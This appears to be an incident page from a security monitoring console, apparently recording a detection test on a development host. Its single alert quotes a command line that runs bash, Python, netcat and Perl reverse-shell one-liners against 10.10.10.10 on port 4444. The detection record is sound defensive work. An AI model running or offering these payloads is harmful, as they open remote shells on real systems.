Back to list

Medium CINC-20251220-2408719A new

Aggregate ID: aggind:021368f9220b45cdb2760a069897c1c8:18068299277

Incident Overview

Incident ID CINC-20251220-2408719A
Severity Medium (70)
Status new
Alert Count 1
Host Count 1

Timeline

First Seen 2025-12-20 08:39:40
Last Seen 2025-12-20 08:39:40
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Command and Control
Techniques:
Remote Access Tools

Affected Hosts (1)

siemdev-14

Related Alerts (1)

Severity Status Hostname Description Tactic Command Line Time
High new siemdev-14 Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected. Command and Control bash -c echo "=== Bash Reverse Shell ===" timeout 3 bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" 2>/dev/null & sleep 1 echo "=== Python Reverse Shell ===" timeout 3 python3 -c "import socket,subprocess,os;s=socket.socket();s.connect((\"10.10.10.10\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])" 2>/dev/null & sleep 1 echo "=== Netcat Reverse Shell ===" timeout 3 nc -e /bin/sh 10.10.10.10 4444 2>/dev/null & sleep 1 echo "=== Perl Reverse Shell ===" timeout 3 perl -e "use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(4444,inet_aton(\"10.10.10.10\")));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");" 2>/dev/null & sleep 1 echo "Done" 12-20 08:39